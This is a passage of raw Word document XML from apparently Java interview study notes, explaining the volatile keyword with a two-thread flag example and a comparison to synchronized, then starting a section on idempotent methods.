      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not guarantee atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, operations like increment (i++) or check-modify (check, modify) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not atomic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> even if the variable is volatile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA2423" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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yntax of volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD901D7" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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olatile int myVariable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F289EF9" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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ow does volatile work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646798B0" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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a variable is declared as volatile, the JVM ensures that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755976CB" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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a thread writes to the volatile variable, the updated value is immediately written to the main memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F484E" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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another thread reads the volatile variable, it fetches the most recent value directly from the main memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F583DF" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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When to Use volatile?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0C9F1" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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olatile is typically used in the following scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E00AC6" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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lag Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to maintain a simple flag or state between multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A4140" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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example, you might use a volatile variable to indicate whether a thread should continue running or stop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B75D645" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ingleton Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Double-Checked Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Singleton design pattern, volatile is often used to ensure that the instance of a class is initialized correctly in a multithreaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9DA61" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hared State Across Threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a variable is shared between threads and you want to ensure that updates made by one thread are visible to others without using synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B8664" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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68F87FE4"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VolatileExamp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04F2F2A"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lati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flag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18D10FDD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A4E34"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toggleFla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E76EE37"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flag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la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oggle the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439D9F34"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0F164F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BAE765"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printFla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84BBFBE"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Flag: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lag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07C2C1"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DC71AC9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B8575"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row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rruptedExcepti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41BBDD6"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VolatileExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exampl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VolatileExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E7689"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58263DA9"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hread 1: Toggle the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1858B5"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> t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70FE934"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exampl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ggleFlag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58723460"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Thread 1 toggled the flag"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30502177"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D209CDD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E7A77"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hread 2: Print the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1CF935"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> t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B910ECB"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whi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xampl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la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6F13F7C"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Waiting for the flag to be true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D6BAA"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3B816BA"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exampl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Fla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Will print "Flag: true" once the flag is toggled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C995C"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DA45CAD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584352A"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art</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF83758"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art</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6FEF74"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D420FBB"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t1</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join</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A624390"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t2</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join</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6C1DC" w14:textId="77777777"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E71F04E" w14:textId="028100FC" w:rsidR="00EA24A3" w:rsidRPr="00CE4B95"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53E84552" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B83D53" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> waits until flag becomes true before printing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715472A" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggles the value of flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657B79A" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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volatile keyword ensures that changes to the flag made by Thread 1 are visible to Thread 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B6243" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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Limitations of volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6165A3F1" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tomicity Not Guaranteed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you're performing compound operations (e.g., count++), volatile will not guarantee atomicity. You may need other synchronization mechanisms like synchronized or AtomicInteger for those cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134F3B48" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It only ensures visibility, but it doesn’t guarantee mutual exclusion or prevent race conditions. For operations that need to be synchronized (such as checks and modifications), you may still need synchronized blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1EDC1" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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parison with synchronized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AF296" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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olatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It ensures visibility and is lightweight because it doesn't involve acquiring locks. But it doesn't provide atomicity or mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9266E" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It guarantees both visibility </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> atomicity, but it involves performance overhead due to locking mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12341DCF" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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74684B7D" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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the volatile keyword in Java when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024EA94" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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need to ensure that a variable is consistently updated and visible across all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03480676" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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variable is shared among multiple threads, and the operations on it are simple (like reading and writing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C9669" w14:textId="77777777" w:rsidR="00451C36" w:rsidRPr="00CE4B95" w:rsidRDefault="00451C36" w:rsidP="00451C3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more complex scenarios (where both visibility and atomicity are required), you may want to consider other concurrency utilities like synchronized blocks or Atomic classes in java.util.concurrent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2AE2C" w14:textId="2703B34B" w:rsidR="00094CDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00094CD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760C8CA">
          <v:rect id="_x0000_i1165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A96AB" w14:textId="1D3215C0" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="000B7329">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc196307521"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an idempotent method in java</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="36BA1AB0" w14:textId="5AB460E5" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in programming refers to a method that can be called multiple times with the same input, but the result will be the same, no matter how many times it is executed. In other words, if you call the method multiple times with the same parameters, it will not have any additional side effects after the first call, and the output will be consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9EB359" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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haracteristics of Idempotent Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5315E8" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ame Output for Same Input</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Calling an idempotent method multiple times with the same input will always produce the same result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C1E15" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Additional Side Effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The state of the system does not change beyond the first execution, even if the method is called multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119AB2F8" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0956E" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232" w:rsidP="00CD25E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sider a simple method that updates the name of a user in a database. If the same name is provided multiple times, the result should be the same after the first update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FD69A" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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UserServic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D289C20" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA61B9" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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userName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583D7D7" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC2095" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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dempotent method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7AC6EC" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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updateUserName</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ew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D2E40EB" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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user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ser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qual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ew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27D7ADF" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            user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ewName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DF8E75" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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569095B" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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9989C48" w14:textId="77777777" w:rsidR="003C1EB0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
